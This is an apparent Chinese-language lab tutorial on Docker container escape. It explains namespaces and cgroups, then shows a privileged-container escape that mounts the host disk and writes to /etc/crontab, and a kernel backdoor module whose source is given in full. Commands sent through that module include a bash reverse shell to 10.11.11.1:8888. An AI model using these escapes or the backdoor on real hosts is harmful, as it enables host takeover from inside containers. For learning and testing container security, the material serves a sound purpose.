参照从0到1的虚拟机逃逸三部曲,实现了一个通过linux内核后门对docker逃逸的例子。
sudo apt install -f docker.io
docker pull ubuntu:18.04
原理
docker原理主要是两大隔离:
- 控制隔离:依赖于linux内核的namespace
- 资源隔离:依赖于linux内核的Cgroup实现
namespace
docker中的sleep进程,pid为14:
$ docker container run -it ubuntu:18.04 bash
root@a668c55cb477:/# sleep 2000 &
[1] 14
root@a668c55cb477:/# ps | grep sleep
14 pts/0 00:00:00 sleep
但其实这个sleep进程在docker外也能查看到,但是pid为194833:
xuanxuan@ubuntu:~$ ps -ef | grep sleep
root 194833 194776 0 01:33 pts/0 00:00:00 sleep 2000
xuanxuan 194845 194838 0 01:33 pts/8 00:00:00 grep --color=auto sleep
可通过/proc/194833/ns目录观察到此进程的namespace,的确与外部进程不同:
xuanxuan@ubuntu:~$ sudo ls -al /proc/194833/ns
[sudo] password for xuanxuan:
total 0
dr-x--x--x 2 root root 0 Jun 18 01:34 .
dr-xr-xr-x 9 root root 0 Jun 18 01:33 ..
lrwxrwxrwx 1 root root 0 Jun 18 01:35 cgroup -> 'cgroup:[4026531835]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 ipc -> 'ipc:[4026532704]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 mnt -> 'mnt:[4026532702]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 net -> 'net:[4026532707]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 pid -> 'pid:[4026532705]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 pid_for_children -> 'pid:[4026532705]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 time -> 'time:[4026531834]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 time_for_children -> 'time:[4026531834]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 user -> 'user:[4026531837]'
lrwxrwxrwx 1 root root 0 Jun 18 01:35 uts -> 'uts:[4026532703]'
xuanxuan@ubuntu:~$ ls -al /proc/self/ns
total 0
dr-x--x--x 2 xuanxuan xuanxuan 0 Jun 18 01:35 .
dr-xr-xr-x 9 xuanxuan xuanxuan 0 Jun 18 01:35 ..
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 cgroup -> 'cgroup:[4026531835]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 ipc -> 'ipc:[4026531839]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 mnt -> 'mnt:[4026531840]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 net -> 'net:[4026531992]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 pid -> 'pid:[4026531836]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 pid_for_children -> 'pid:[4026531836]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 time -> 'time:[4026531834]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 time_for_children -> 'time:[4026531834]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 user -> 'user:[4026531837]'
lrwxrwxrwx 1 xuanxuan xuanxuan 0 Jun 18 01:35 uts -> 'uts:[4026531838]'
所以docker容器里的进程,在docker宿主机上看来是namespace特殊的进程。这和qemu,vmware等虚拟机不同,这种完全虚拟化的方案,在外部看来只有虚拟机进程本身,在外部不能直接看到内部进程信息。
Cgroup
有一个神奇的文件系统类型是cgroup:
$ mount | grep cgroup
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755,inode64)
cgroup2 on /sys/fs/cgroup/unified type cgroup2 (rw,nosuid,nodev,noexec,relatime,nsdelegate)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/misc type cgroup (rw,nosuid,nodev,noexec,relatime,misc)
在这个文件系统中的目录下,新建空的文件夹,会自动生成一些文件:
$ cd /sys/fs/cgroup/cpu
$ sudo mkdir slow_cpu
$ cd slow_cpu
$ ls
cgroup.clone_children cpuacct.usage_percpu_sys cpu.shares
cgroup.procs cpuacct.usage_percpu_user cpu.stat
cpuacct.stat cpuacct.usage_sys cpu.uclamp.max
cpuacct.usage cpuacct.usage_user cpu.uclamp.min
cpuacct.usage_all cpu.cfs_period_us notify_on_release
cpuacct.usage_percpu cpu.cfs_quota_us tasks
每新建的一个文件夹代表一种配置,需要用root权限对配置文件修改,以下改法为当然配置只能用10%的CPU:
$ sudo su
$ echo 100000 > ./cpu.cfs_period_us
$ echo 10000 > ./cpu.cfs_quota_us
创建一个死循环占用CPU的进程,top命令观察CPU占用几乎为100%:
xuanxuan@ubuntu:~$ while true ; do echo 1 > /dev/null ; done &
[1] 195005
xuanxuan@ubuntu:~$ top
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
195005 xuanxuan 20 0 11140 2528 624 R 98.7 0.0 0:11.20 bash
将此死循环进程号加入刚才创建的慢CPU配置文件中,然后再次观察CPU占用下降为10%:
xuanxuan@ubuntu:~$ sudo su -c "echo 195005 > /sys/fs/cgroup/cpu/slow_cpu/tasks"
xuanxuan@ubuntu:~$ top
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
195005 xuanxuan 20 0 11140 2528 624 R 10.0 0.0 2:11.88 bash
技巧
判段内外
根目录下的.dockerenv
文件:
root@a668c55cb477:/# ls -al /
total 72
drwxr-xr-x 1 root root 4096 Jun 18 08:33 .
drwxr-xr-x 1 root root 4096 Jun 18 08:33 ..
-rwxr-xr-x 1 root root 0 Jun 18 08:33 .dockerenv
1号进程的cgroup信息:
root@a668c55cb477:/# cat /proc/1/cgroup
13:misc:/
12:blkio:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
11:pids:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
10:perf_event:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
9:net_cls,net_prio:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
8:memory:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
7:rdma:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
6:devices:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
5:cpu,cpuacct:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
4:cpuset:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
3:hugetlb:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
2:freezer:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
1:name=systemd:/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
0::/docker/a668c55cb4774aec4e3f11dc8b08e8635ac94995d13e76011fdd97d79760a61b
mount 信息:
root@a668c55cb477:/# mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/BGPXKTWJNHKOUJXU6Q376NWVOL:/var/lib/docker/overlay2/l/Q23MHYI2YS55FM6SSF64IX4ZSD,upperdir=/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/diff,workdir=/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755,inode64)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/misc type cgroup (rw,nosuid,nodev,noexec,relatime,misc)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,inode64)
/dev/sda5 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro)
/dev/sda5 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro)
/dev/sda5 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro)
devpts on /dev/console type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
文件系统
在docker内的文件系统,可以直接在宿主机的文件系统中找到么?可以!这里我先在docker中新建一个文件:
root@a668c55cb477:/# echo nihao123 > /xuanxuan
root@a668c55cb477:/# ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var xuanxuan
root@a668c55cb477:/# cat xuanxuan
nihao123
然后可以查看容器内的mount信息:
root@a668c55cb477:/# mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/BGPXKTWJNHKOUJXU6Q376NWVOL:/var/lib/docker/overlay2/l/Q23MHYI2YS55FM6SSF64IX4ZSD,upperdir=/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/diff,workdir=/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/work)
重点关注upperdir或者workdir,将work或者diff换成merged,即为其在宿主机的目录
/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/merged
可在宿主机上查看到刚才在docker新建的文件:
root@ubuntu:/# cd var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/merged/
root@ubuntu:/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/merged# ls
bin dev home lib64 mnt proc run srv tmp var
boot etc lib media opt root sbin sys usr xuanxuan
root@ubuntu:/var/lib/docker/overlay2/147de1bdf9d9bdd817a62d0e3d6ed8947605f0fe5ac15459871098ffed89e6cd/merged# cat xuanxuan
nihao123
简单逃逸
privileged
--privileged
参数使得docker容器可以访问绝大部分硬件外设,导致可以直接挂载宿主机磁盘完成逃逸:
$ docker container run --privileged -it ubuntu:18.04 bash
root@f19b37b45a9c:/# ls /dev
autofs kmsg mcelog sg1 tty2 tty39 tty58 ttyS19 ttyprintk vcsu1
bsg lightnvm media0 shm tty20 tty4 tty59 ttyS2 udmabuf vcsu2
btrfs-control loop-control mem snapshot tty21 tty40 tty6 ttyS20 uhid vcsu3
bus loop0 midi snd tty22 tty41 tty60 ttyS21 uinput vcsu4
console loop1 mqueue sr0 tty23 tty42 tty61 ttyS22 urandom vcsu5
core loop10 net stderr tty24 tty43 tty62 ttyS23 userio vcsu6
cpu loop11 null stdin tty25 tty44 tty63 ttyS24 vcs vfio
cpu_dma_latency loop12 nvram stdout tty26 tty45 tty7 ttyS25 vcs1 vga_arbiter
cuse loop13 port tty tty27 tty46 tty8 ttyS26 vcs2 vhci
dma_heap loop14 ppp tty0 tty28 tty47 tty9 ttyS27 vcs3 vhost-net
dmmidi loop15 psaux tty1 tty29 tty48 ttyS0 ttyS28 vcs4 vhost-vsock
dri loop16 ptmx tty10 tty3 tty49 ttyS1 ttyS29 vcs5 video0
ecryptfs loop2 pts tty11 tty30 tty5 ttyS10 ttyS3 vcs6 video1
fb0 loop3 random tty12 tty31 tty50 ttyS11 ttyS30 vcsa vmci
fd loop4 rfkill tty13 tty32 tty51 ttyS12 ttyS31 vcsa1 vsock
full loop5 rtc0 tty14 tty33 tty52 ttyS13 ttyS4 vcsa2 zero
fuse loop6 sda tty15 tty34 tty53 ttyS14 ttyS5 vcsa3 zfs
hidraw0 loop7 sda1 tty16 tty35 tty54 ttyS15 ttyS6 vcsa4
hpet loop8 sda2 tty17 tty36 tty55 ttyS16 ttyS7 vcsa5
hwrng loop9 sda5 tty18 tty37 tty56 ttyS17 ttyS8 vcsa6
input mapper sg0 tty19 tty38 tty57 ttyS18 ttyS9 vcsu
root@f19b37b45a9c:/# mkdir escape
root@f19b37b45a9c:/# mount /dev/sda5 /escape/
root@f19b37b45a9c:/# ls /escape/
'I'$'\004' boot dev flag lib lib64 lost+found mnt proc run snap swapfile tmp var
bin cdrom etc home lib32 libx32 media opt root sbin srv sys usr
root@f19b37b45a9c:/# cat /escape/flag
flag{this_is_the_flag}
为什么是sda5?
答:在宿主机上查看mount信息,可知sda5即根文件系统所在磁盘分区:
xuanxuan@ubuntu:~$ mount | grep sda
/dev/sda5 on / type ext4
/dev/sda1 on /boot/efi type vfat
如果没有宿主机shell怎么办?sdxx之类的,挨个试!
如何执行命令?
方法必然是通过宿主机的文件系统作为跳板,然后让宿主机执行代码,常见的办法是使用定时任务crontab,知道宿主机的普通用户:
xuanxuan@ubuntu:$ id
uid=1000(xuanxuan) gid=1000(xuanxuan) groups=1000(xuanxuan)
也可在docker中通过逃出去的/etc/passwd文件查看:
root@a668c55cb477:/# cat /escape/etc/passwd
root:x:0:0:root:/root:/bin/bash
...
xuanxuan:x:1000:1000:xuanxuan,,,:/home/xuanxuan:/bin/bash
...
ubuntu中全局的crontab落地文件为/etc/crontab
,追加写入定时任务配置,即可等一分钟弹计算器:
root@f19b37b45a9c:/# echo "* * * * * xuanxuan DISPLAY=:0 /usr/bin/gnome-calculator" >> /escape/etc/crontab
内核态漏洞
在ubuntu 20.04完成
在以linux为底座的情况下,由于docker和宿主机共用linux内核,这使得逃逸过程可以退化为对linux内核漏洞的利用。例如使用内核函数call_usermodehelper拉起的用户态进程就直接是在宿主机正常namespace的root进程,在docker里如果能触发完成此过程,则完成逃逸。例如使用如下后门内核模块:
#include <linux/init.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
MODULE_LICENSE("GPL");
static ssize_t kshell_write(struct file *file, const char __user *ubuf, size_t count, loff_t *ppos)
{
char buf[0x1000];
copy_from_user(buf, ubuf, count);
char *cmd_argv[] = {"/usr/bin/bash", "-c",buf,NULL};
call_usermodehelper("/usr/bin/bash", cmd_argv, NULL, UMH_WAIT_PROC);
return count;
}
const struct proc_ops myops = {
.proc_write = kshell_write
};
static int kshell_init(void)
{
printk(KERN_INFO "kernel shell, init!\n");
proc_create("kshell",0666,NULL,&myops);
return 0;
}
static void kshell_exit(void)
{
remove_proc_entry("kshell", NULL);
printk(KERN_INFO "kernel shell, exit!\n");
}
module_init(kshell_init);
module_exit(kshell_exit);
obj-m += hello.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
编译、insmod、并映射到docker容器中:
$ git clone https://github.com/xuanxuanblingbling/linux_kernel_module_exercise
$ cd linux_kernel_module_exercise/05.ksehll
$ make
$ sudo insmod kshell.ko
$ docker container run -v /proc/kshell:/kshell -it ubuntu:18.04 bash
不过在最后利用的形式上与内核提权有所差异,由于namespace的影响,不直接通过回用户态然后执行/bin/sh在docker中获得一个宿主机的shell,但可以出网弹shell:
root@03ea4622e658:/# echo "/usr/bin/bash -i >& /dev/tcp/10.11.11.1/8888 0>&1 &" > /kshell
也可以使用落地文件,将命令在本地回显:
root@03ea4622e658:/opt# mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/6NRKJVEFBBGFB3UAOG4SELSIPD:/var/lib/docker/overlay2/l/Q23MHYI2YS55FM6SSF64IX4ZSD,upperdir=/var/lib/docker/overlay2/be01093928ed89406df771649c8249d89b77598b05639bca139673bea7bc2a4e/diff,workdir=/var/lib/docker/overlay2/be01093928ed89406df771649c8249d89b77598b05639bca139673bea7bc2a4e/work)
root@03ea4622e658:/# echo "id > /var/lib/docker/overlay2/be01093928ed89406df771649c8249d89b77598b05639bca139673bea7bc2a4e/merged/1.txt" > /kshell
root@03ea4622e658:/# cat 1.txt
uid=0(root) gid=0(root) groups=0(root)
还可以在宿主机上弹计算机(GUI程序不能使用root,要切回普通用户,卡了一晚上):
root@03ea4622e658:/# echo "su xuanxuan -c 'DISPLAY=:0 /usr/bin/gnome-calculator &'" > /kshell
复杂逃逸
内核态的利用一般仍归属于linux内核,并且看起来更多的逃逸都是与docker的使用、配置相关,在二进制上攻破docker守护进程本身并不常见,所以暂时搁置。
不过由于逃逸,所以在搭建题目上需要做队伍间隔离,一般三层:docker(deploy)-> qemu(flag)-> docker(attack):